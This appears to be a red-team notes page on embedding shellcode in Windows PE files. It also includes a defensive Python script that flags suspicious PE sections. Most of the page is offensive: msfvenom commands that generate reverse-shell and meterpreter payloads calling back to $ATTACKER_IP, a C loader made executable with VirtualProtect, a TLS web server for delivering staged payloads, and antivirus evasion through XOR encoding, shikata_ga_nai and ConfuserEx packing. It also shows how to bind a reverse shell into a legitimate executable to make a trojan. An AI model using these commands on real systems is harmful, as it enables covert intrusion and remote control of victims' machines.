# PE Shellcode

## General PE Information

- [PE structure](../../../reverse engineering/windows/portable-executable.md)
## Inserting Shellcode

Several sections of the PE can hold the shellcode; which one is used depends on how the shellcode variable is initialized. When the shellcode is defined as:

- a local variable inside the main function, it is stored in the `.text` section
- a global variable, it is stored in the `.data` section
- a raw binary embedded in an icon image and referenced from the code, it is stored in the `.rsrc` section
- a custom data section, it is stored in that unusual section
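The analyst-side counterpart of the list above, added here as an example that is not part of the original notes: a small section-table parser that flags the traits a loader of this kind tends to leave behind (a non-standard section name, a section that is both writable and executable, or executable memory that is not marked as code). The baseline of "expected" section names and the headers-only sample PE are constructed for the example.

```python
import struct

IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x40000000, 0x80000000
# Names a stock MinGW/MSVC build normally carries (assumed baseline for the heuristic)
EXPECTED_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                  ".rsrc", ".reloc", ".pdata", ".tls", ".CRT", ".xdata"}

def parse_sections(pe):
    """Walk DOS header -> e_lfanew -> COFF header -> section table; return (name, vsize, rawsize, flags)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", pe, pe_off + 6)[0]          # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]     # COFF SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                               # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, vsize, _va, rsize, _raw, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rsize, flags))
    return sections

def suspicious_sections(pe):
    """Return [(name, [reasons])] for the sections a triage analyst should look at first."""
    findings = []
    for name, _vsize, _rsize, flags in parse_sections(pe):
        reasons = []
        if name not in EXPECTED_NAMES:
            reasons.append("non-standard section name")
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable and executable")
        if flags & IMAGE_SCN_MEM_EXECUTE and not flags & IMAGE_SCN_CNT_CODE:
            reasons.append("executable but not flagged as code")
        if reasons:
            findings.append((name, reasons))
    return findings

def build_pe(sections):
    """Constructed headers-only PE32 image for offline testing (not a runnable binary)."""
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew = 64
    opt = b"\x0b\x01" + bytes(222)                                                 # PE32 magic, rest zeroed
    coff = struct.pack("<IHHIIIHH", 0x4550, 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), 0x1000, 0x1000 * (i + 1), 0x200,
                                0x400 + 0x200 * i, 0, 0, 0, 0, f) for i, (n, f) in enumerate(sections))
    return bytes(dos) + coff + opt + hdrs

SAMPLE = build_pe([(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
                   (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
                   (".scode", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE)])

if __name__ == "__main__":
    for name, reasons in suspicious_sections(SAMPLE):
        print(name, "->", ", ".join(reasons))
```

A loader that keeps its payload in `.data` and calls `VirtualProtect` at runtime leaves the section flags clean, so this static check should be paired with a look at the import table and with runtime monitoring of protection changes.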
## Crafting Shellcode

- Use msfvenom to generate shellcode that launches the calculator

```shell
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c
```

- Fill in the missing parts to turn the output into a valid C file (the `buf` array becomes a global, so it ends up in `.data` and is made executable at runtime with `VirtualProtect`)

```shell
sed -i '1s/^/#include <windows.h>\n/' stage.c
sed -i 's/=/= {/' stage.c
sed -i 's/;/};/' stage.c
echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c
```

- Compile it

```shell
i686-w64-mingw32-gcc stage.c -o vcalc.exe
```
## Compile C#

The Microsoft Visual C# compiler is invoked with

```shell
csc file.cs
```
## Staged C2

- The stage on the target needs to download the remaining parts of the shell into memory
- These parts may be generated in one of the following ways (all of them will be detected by AV)

```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe
```

- Generate a certificate for the webserver

```shell
openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes
```

- Start the webserver (`ssl.wrap_socket()` was removed in Python 3.12, so an `SSLContext` is used instead; the minimum version is pinned to TLS 1.2 as in the original one-liner)

```shell
sudo python3 -c "import http.server, ssl;ctx=ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER);ctx.minimum_version=ssl.TLSVersion.TLSv1_2;ctx.load_cert_chain('webserver.pem');httpd=http.server.HTTPServer(('0.0.0.0',443),http.server.SimpleHTTPRequestHandler);httpd.socket=ctx.wrap_socket(httpd.socket,server_side=True);httpd.serve_forever()"
```
## Generate Custom Shellcode

- The goal is to bypass the AV

### Xor and Encode

```shell
msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
```

- Xor and encode the payload; decode it on the target before it is executed
### Packer

- Compresses and obfuscates the shellcode inside a binary
- Obviously, an unpacker has to be included in the binary alongside the packed code
- mkaring's ConfuserEx
  - Select the directory and binary
  - Go to Settings, enable the packer and create rules
  - Edit the rule as well
  - Go to Protect and click the button
### Binding

- Used to merge binaries
- The shellcode is merged into a legitimate PE and runs as an additional thread

```shell
msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe
```

- Bound PEs need some disguising as well
## Tools & Tips

- hasherezade's PE-bear gives an overview of the PE's sections
- asmtutor.com
- mvelazc0's staged payload